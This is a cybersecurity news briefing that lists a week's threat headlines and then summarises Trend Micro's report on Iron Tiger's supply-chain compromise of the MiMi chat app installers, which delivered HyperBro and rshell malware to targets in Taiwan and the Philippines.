At a glance.
- Iron Tiger's supply chain campaign.
- An update on RedAlpha.
- Cl0p gang hits English water utility.
- Microsoft identifies and disrupts Russian cyberespionage activity.
- Vulnerabilities in Zimbra undergoing widespread exploitation.
- DDoS attack against Energoatom's public website.
- New Lazarus Group activity reported.
- Iran suspected of cyber operations against four Israeli sectors.
- Cyber war clauses coming to cyber insurance policies.
- BlackByte is back, and calling itself BlackByte 2.0.
- Cozy Bear update.
- Criminal gang targets the travel and hospitality sectors.
Iron Tiger's supply chain campaign.
Trend Micro reported last Friday that Iron Tiger, a state-run threat actor associated with China (and also known as APT27, Emissary Panda, Bronze Union, and Luckymouse) has compromised the MiMi chat app with a view to attacking Mac OS systems, the first time, say the researchers, that this particular targeting has been used by the group.
"We noticed that a chat application named MiMi retrieved the rshell executable, an app we came across recently while investigating threat actor Earth Berberoka. We noticed Iron Tiger controlling the servers hosting the app installers of MiMi, suggesting a supply chain attack. Further investigation showed that MiMi chat installers have been compromised to download and install HyperBro samples for the Windows platform and rshell samples for the Mac OS platform. While this was not the first time the technique was used, this latest development shows Iron Tiger’s interest in compromising victims using the three major platforms: Windows, Linux, and macOS."
MiMi ("Secret") is designed for Chinese users, who represent the greater part of its clientele. Trend Micro found in the course of its investigation that "in this instance Iron Tiger compromised the server hosting the legitimate installers for this chat application for a supply chain attack." The targets of the campaign were in Taiwan and the Philippines.